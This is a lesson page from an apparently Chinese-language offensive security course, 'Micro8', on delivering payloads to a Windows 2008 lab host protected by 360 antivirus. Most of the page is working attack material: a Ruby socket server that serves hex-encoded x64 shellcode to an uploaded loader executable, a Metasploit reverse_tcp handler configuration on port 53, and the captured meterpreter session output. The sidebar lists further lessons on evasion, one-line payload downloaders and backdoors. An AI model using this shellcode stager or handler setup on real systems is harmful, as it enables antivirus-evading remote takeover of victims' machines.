Micro8
  • 前言
  • Preface
  • 目录
  • 第一章:生
    • 1-10课
      • 第一课:windows提权-快速查找exp
      • 第二课:Linux提权-依赖exp篇
      • 第三课:Delphi代码审计--项目实战1
      • 第四课:Asp代码审计--项目实战2
      • 第五课:工具介绍-Sqlmap
      • 第六课:反攻的一次溯源--项目实战3
      • 第七课:sql server 常用操作远程桌面语句
      • 第八课:模拟诉求任务攻击
      • 第九课:工具介绍-the-backdoor-factory
      • 第十课:msfvenom常用生成payload命令
    • 11-20课
      • 第十一课:工具介绍Veil-Evasion
      • 第十二课:基于UDP发现内网存活主机
      • 第十三课:基于ARP发现内网存活主机
      • 第十四课:基于第十课补充payload1
      • 第十五课:基于第十课补充payload2
      • 第十六课:红蓝对抗渗透测试1
      • 第十七课:红蓝对抗渗透测试2
      • 第十八课:红蓝对抗渗透测试3
      • 第十九课:基于netbios发现内网存活主机
      • 第二十课:基于snmp发现内网存活主机
    • 21-30课
      • 第二十一课:基于ICMP发现内网存活主机
      • 第二十二课:基于SMB发现内网存活主机
      • 第二十三课:基于MSF发现内网存活主机第一季
      • 第二十四课:基于MSF发现内网存活主机第二季
      • 第二十五课:基于MSF发现内网存活主机第三季
      • 第二十六课:基于MSF发现内网存活主机第四季
      • 第二十七课:基于MSF发现内网存活主机第五季
      • 第二十八课:基于MSF发现内网存活主机第六季
      • 第二十九课:发现目标WEB程序敏感目录第一季
      • 第三十课:解决msfvenom命令自动补全
    • 31-40课
      • 第三十一课:msf的前生今世
      • 第三十二课:配置vps上的msf
      • 第三十三课:攻击Mysql服务
      • 第三十四课:攻击Sql server 服务
      • 第三十五课:与Sqlmap结合攻击
      • 第三十六课:解决vps上ssh掉线
      • 第三十七课:vbs一句话下载payload
      • 第三十八课:certutil一句话下载payload
      • 第三十九课:vbs一句话下载payload补充
      • 第四十课:ftp一句话下载payload
    • 41-50课
      • 第四十一课:bitsadmin一句话下载payload
      • 第四十二课:攻击FTP服务
      • 第四十三课:js一句话下载payload
      • 第四十四课:ertutil一句话下载payload补充
      • 第四十五课:解决bat一句话下载payload黑窗
      • 第四十六课:powershell一句话下载payload
      • 第四十七课:payload分离免杀思路
      • 第四十八课:payload分离免杀思路第二季
      • 第四十九课:关于Powershell对抗安全软件
      • 第五十课:基于SqlDataSourceEnumerator发现内网存活主机
    • 51-60课
      • 第五十一课:项目回忆:体系的本质是知识点串联
      • 第五十二课:渗透的本质是信息搜集
      • 第五十三课:内网渗透中的文件传输
      • 第五十四课:基于Powershell做Socks 4-5代理
      • 第五十五课:与Smbmap结合攻击
      • 第五十六课:离线提取目标机hash
      • 第五十七课:高级持续渗透-第一季关于后门
      • 第五十八课:高级持续渗透-第二季关于后门补充一
      • 第五十九课:高级持续渗透-第三季关于后门补充二
      • 第六十课:高级持续渗透-第四季关于后门
    • 61-70课
      • 第六十一课:高级持续渗透-第五季关于后门
      • 第六十二课:高级持续渗透-第六季关于后门
      • 第六十三课:高级持续渗透-第七季demo的成长
      • 第六十四课:高级持续渗透-第八季demo便是远控
      • 第六十五课:离线提取目标机hash补充
      • 第六十六课:借助aspx对payload进行分离免杀
      • 第六十七课:meterpreter下的irb操作第一季
      • 第六十八课:基于Ruby内存加载shellcode第一季
      • 第六十九课:渗透,持续渗透,后渗透的本质
      • 第七十课:ftp一句话下载payload补充
    • 71-80课
      • 第七十一课:基于白名单Msbuild.exe执行payload第一季
      • 第七十二课:基于白名单Installutil.exe执行payload第二季
      • 第七十三课:基于白名单Regasm.exe执行payload第三季
      • 第七十四课:基于白名单Regsvcs.exe执行payload第四季
      • 第七十五课:基于白名单Mshta.exe执行payload第五季
      • 第七十六课:基于白名单Compiler.exe执行payload第六季
      • 第七十七课:基于白名单Csc.exe执行payload第七季
      • 第七十八课:基于白名单Msiexec执行payload第八季
      • 第七十九课:基于白名单Regsvr32执行payload第九季
      • 第八十课:基于白名单Wmic执行payload第十季
    • 81-90课
      • 第八十一课:基于白名单Rundll32.exe执行payload第十一季
      • 第八十二课:基于白名单Odbcconf执行payload第十二季
      • 第八十三课:基于白名单PsExec执行payload第十三季
      • 第八十四课:基于白名单Forfiles执行payload第十四季
      • 第八十五课:基于白名单Pcalua执行payload第十五季
      • 第八十六课:基于白名单Msiexec执行payload第八季补充
      • 第八十七课:基于白名单Cmstp.exe执行payload第十六季
      • 第八十八课:基于白名单Ftp.exe执行payload第十九季
      • 第八十九课:基于白名单Url.dll执行payload第十七季
      • 第九十课:基于白名单zipfldr.dll执行payload第十八季
    • 91-100课
      • 第九十一课:从目标文件中做信息搜集第一季
      • 第九十二课:实战中的Payload应用
      • 第九十三课:与CrackMapExec结合攻击
      • 第九十四课:基于实战中的small payload
      • 第九十五课:基于Portfwd端口转发
      • 第九十六课:HTTP隧道ABPTTS第一季
      • 第九十七课:MSF配置自定义Payload控制目标主机权限
      • 第九十八课:HTTP隧道reGeorg第二季
      • 第九十九课:HTTP隧道Tunna第三季
      • 第一百课:HTTP隧道reDuh第四季
  • 第二章:老(待更新...)
    • 第一百零一课:基于SCF做目标内网信息搜集第二季
    • 第一百零二课:对抗权限长期把控-伪造无效签名第一季
    • 第一百零三课:Http加密隧道下的横向渗透尝试---klion
    • 第一百零四课:Windows Smb 欺骗重放攻击利用---klion
    • 第一百零五课:windows 单机免杀抓明文或hash [通过dump lsass进程数据]---klion
    • 第一百零六课:windows 单机免杀抓明文或hash [通过简单混淆编码绕过常规静态检测]---klion
    • 第一百零七课:跨平台横向移动 [ windows计划任务利用 ]---klion
    • 第一百零八课:跨平台横向移动 [wmi利用]---klion
    • 第一百零九课:依托 metasploit 尽可能多的发现目标内网下的各类高价值存活主机---klion
    • 第一百一十课:窃取,伪造模拟各种windows访问令牌[token利用]---klion
    • 第一百一十一课:内网mssql完整利用流程 [ 基础篇 ]---klion
    • 第一百一十二课:利用Dropbox中转C2流量---klion
    • 第一百一十三课:COM Hijacking---倾旋
    • 第一百一十四课:渗透沉思录
    • 第一百一十五课:使用CrackMapExec 进行 NTLM Hash传递攻击---倾旋
    • 第一百一十六课:Windows域渗透 - 用户密码枚举---倾旋
    • 第一百一十七课:Windows 本地特权提升技巧---倾旋
    • 第一百一十八课:CVE-2017-11882钓鱼攻击---倾旋
    • 第一百一十九课:全平台高性能加密隧道 ssf---klion
    • 第一百二十课:win自带的高级网络配置管理工具深度应用 [ netsh ]---klion
    • 第一百二十一课:http加密代理深度应用 [ abptts ]---klion
    • 第一百二十二课:利用 ssh隧道实现内网断网机meterpreter反向上线---klion
    • 第一百二十三课:利用ssh隧道将公网meterpreter弹至本地的msf中---klion
  • 第三章:病(待更新...)
Powered by GitBook
On this page
  • 目标机位x64位 Windows 2008
  • 配置payload:
  • 上传Micropoor_shellcode_x64.exe
  • 配置msf:
  • 靶机执行:
  • 靶机:
  • 附录:

Was this helpful?

  1. 第一章:生
  2. 91-100课

第九十二课:实战中的Payload应用

攻击机: 192.168.1.4 Debian 靶机: 192.168.1.2 Windows 2008

目标机安装:360卫士+360杀毒

[*] 磁盘列表 [ C:D:E: ]
C:\inetpub\wwwroot\> tasklist 

映像名称 PID 会话名 会话\# 内存使用
 ========================= ======== ================ =========== ============

System Idle Process 0 0 24 K
System 4 0 372 K
smss.exe 236 0 956 K
csrss.exe 324 0 5,572 K
csrss.exe 364 1 14,452 K
wininit.exe 372 0 4,508 K
winlogon.exe 408 1 5,364 K
services.exe 468 0 7,376 K
lsass.exe 476 0 9,896 K
lsm.exe 484 0 3,876 K
svchost.exe 576 0 8,684 K
vmacthlp.exe 632 0 3,784 K
svchost.exe 676 0 7,384 K
svchost.exe 764 0 12,716 K
svchost.exe 800 0 29,792 K
svchost.exe 848 0 11,248 K
svchost.exe 900 0 9,308 K
svchost.exe 940 0 16,184 K
svchost.exe 332 0 11,800 K
spoolsv.exe 548 0 15,568 K
svchost.exe 1052 0 8,228 K
svchost.exe 1076 0 8,808 K
svchost.exe 1144 0 2,576 K
VGAuthService.exe 1216 0 10,360 K
vmtoolsd.exe 1300 0 18,068 K
ManagementAgentHost.exe 1332 0 8,844 K
svchost.exe 1368 0 11,884 K
WmiPrvSE.exe 1768 0 13,016 K
dllhost.exe 1848 0 11,224 K
msdtc.exe 1940 0 7,736 K
WmiPrvSE.exe 1440 0 19,768 K
mscorsvw.exe 296 0 4,732 K
mscorsvw.exe 584 0 5,088 K
sppsvc.exe 1476 0 8,408 K
taskhost.exe 2612 1 6,344 K
dwm.exe 2868 1 4,604 K
explorer.exe 2896 1 44,912 K
vmtoolsd.exe 3008 1 17,744 K
TrustedInstaller.exe 2268 0 15,776 K
360Tray.exe 2684 1 6,056 K
360sd.exe 2636 1 1,316 K
ZhuDongFangYu.exe 2456 0 14,292 K
360rp.exe 1712 1 27,072 K
SoftMgrLite.exe 864 1 16,816 K
w3wp.exe 3300 0 42,836 K
svchost.exe 3840 0 4,584 K
notepad.exe 3712 1 5,772 K
cmd.exe 3384 0 2,376 K
conhost.exe 3520 0 3,420 K
tasklist.exe 3096 0 5,276 K 58
C:\> dir
驱动器 C 中的卷没有标签。
卷的序列号是 C6F8‐9BAB

C:\ 的目录
2017/12/13 03:28 <DIR> inetpub
2009/07/14 11:20 <DIR> PerfLogs
2017/12/13 03:28 <DIR> Program Files
2019/01/23 14:09 <DIR> Program Files (x86)
2019/01/23 14:15 <DIR> Users
2017/12/13 03:25 <DIR> Windows
0 个文件 0 字节
6 个目录 21,387,132,928 可用字节

目标机位x64位 Windows 2008

C:\> ver 
Microsoft Windows [版本 6.1.7600]

配置payload:

root@John:/var/www/html# cat ./Micropoor_rev.rb

require 'socket'
if ARGV.empty?
  puts "Usage:"
  puts "Micropoor.rb port"
  exit
end 

PORT = ARGV.first.to_i 

def handle_connection(client)
  puts "Payload is on‐line \#{client}" 
  client.write("4831c94881e9c0ffffff488d05efffffff48bb32667fcceeadb9f74
8315827482df8ffffffe2f4ce2efc281e4575f732663e9daffdeba6642e4e1e8be532a552
2ef49ef6e532a5122ef4bebee5b640782c32fd27e588379e5a1eb0ec8199b6f3af728def6
c5b1a60272e8465ff997c705a37cd3ecb388f2a6d7dc36bdfb9f732edff44eeadb9bfb7a6
0baba6ac69a7b92e678865ed99be33b69c9aa65270b6b952f784ef7bf4c6fb2e4e0c42ec7  
83e3f277e0dd64dcc067e6533e8e6e8802647be278865ed9dbe33b6198d65a1f1b3b92663
85ef7df87c36ee37cd3eece1b66a382696aff5f8ae733c374f028df8a5cd86278db7f7f17 
c208f34331152e4be8c110cfeb19e8bf732272985674bf176dec67ecceee430127bda7dcc 
ee98795f33623e98a7245dbbbb973e76a2da9ff0cdb3334504c5b8f63266268d5484399c3  
299aaa6e4ece7a7622b4e05a39c79bfcda637452ce546377aefbe8d5447b628d299aa8467 
6ad3e7733e33450ce5300e73dce6699acc4622b7a60bc6a7527782d78eeccceeadf174de7 
637450ce0883e58623e94a62440b68864a604b1526c74ca660199a62e7dd76cef89a6aeec 
e09f32767fccaff5f17ec02e4e05af17e15361838019a6247abebba132fd27e430077aefa
5846754f84d30bfb79311783a0f321b5794affae09f32267fccaff5d3f76827c5c7c1a289  
08e731268d54d8d7ba5399aa85116350cbcd998084ef6ef1def42efa3a9b19f808d53e15ccb7e47e35c2d3dd9a1178b9f7")

  client.close
end 

socket = TCPServer.new('0.0.0.0', PORT)
puts "Listening on \#{PORT}. " 

while client = socket.accept
  Thread.new { handle_connection(client)}
end 

root@John:/var/www/html# ruby ./Micropoor_rev.rb 8080

Listening on 8080.

上传Micropoor_shellcode_x64.exe

配置msf:

msf exploit(multi/handler) > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) > show options 
Module options (exploit/multi/handler):

Name Current Setting Required Description
‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐ 
Payload options (windows/x64/meterpreter/reverse_tcp): 

Name Current Setting Required Description
‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)

LHOST 192.168.1.4 yes The listen address (an interface may be specified)
LPORT 53 yes The listen port

Exploit target: 

Id Name
‐‐ ‐‐‐‐
0 Wildcard Target 

msf exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.1.4:53

靶机执行:

msf exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.1.4:53
[*] Sending stage (206403 bytes) to 192.168.1.2
[*] Meterpreter session 6 opened (192.168.1.4:53 ‐> 192.168.1.2:49744)
at 2019‐01‐23 01:29:00 ‐0500

meterpreter > getuid
Server username: IIS APPPOOL\DefaultAppPool
meterpreter > sysinfo
Computer : WIN‐5BMI9HGC42S
OS : Windows 2008 R2 (Build 7600).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > ipconfig 

Interface 1
============ 
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff 

Interface 11
============ 
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:bc:0d:5c
MTU : 1500
IPv4 Address : 192.168.1.2
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::5582:70c8:a5a8:8223
IPv6 Netmask : ffff:ffff:ffff:ffff::
meterpreter > ps 

Process List
============ 

PID PPID Name Arch Session User Path
‐‐‐ ‐‐‐‐ ‐‐‐‐ ‐‐‐‐ ‐‐‐‐‐‐‐ ‐‐‐‐ ‐‐‐‐
0 0 [System Process]
4 0 System
236 4 smss.exe
296 468 mscorsvw.exe
324 316 csrss.exe
332 468 svchost.exe
364 356 csrss.exe
372 316 wininit.exe
408 356 winlogon.exe
468 372 services.exe
476 372 lsass.exe
484 372 lsm.exe
548 468 spoolsv.exe
576 468 svchost.exe
584 468 mscorsvw.exe
632 468 vmacthlp.exe
676 468 svchost.exe
764 468 svchost.exe
800 468 svchost.exe
848 468 svchost.exe
864 2684 SoftMgrLite.exe
900 468 svchost.exe
940 468 svchost.exe
1052 468 svchost.exe
1076 468 svchost.exe
1144 468 svchost.exe
1216 468 VGAuthService.exe
1300 468 vmtoolsd.exe
1332 468 ManagementAgentHost.exe
1368 468 svchost.exe
1440 576 WmiPrvSE.exe
1476 468 sppsvc.exe
1712 2636 360rp.exe
1768 576 WmiPrvSE.exe
1848 468 dllhost.exe
1940 468 msdtc.exe
2456 468 ZhuDongFangYu.exe
2612 468 taskhost.exe
2636 1096 360sd.exe
2684 1096 360Tray.exe
2788 3408 Micropoor_shellcode_x64.exe x64 0 IIS APPPOOL\DefaultAppPool C:\inetpub\wwwroot\Micropoor_shellcode_x64.exe
2868 900 dwm.exe
2896 2852 explorer.exe
3008 2896 vmtoolsd.exe
3196 468 svchost.exe
3300 1368 w3wp.exe x64 0 IIS APPPOOL\DefaultAppPool c:\windows\system32\inetsrv\w3wp.exe
3408 3300 cmd.exe x64 0 IIS APPPOOL\DefaultAppPool C:\Windows\system32\cmd.exe
3712 2896 notepad.exe
4092 324 conhost.exe x64 0 IIS APPPOOL\DefaultAppPool C:\Windows\system32\conhost.exe

meterpreter >

靶机:

附录:

Micropoor_shellcode for payload backdoor

Micropoor

Previous第九十一课:从目标文件中做信息搜集第一季Next第九十三课:与CrackMapExec结合攻击

Last updated 6 years ago

Was this helpful?

https://micropoor.blogspot.com/2019/01/micropoorshellcode-for-payload-backdoor.html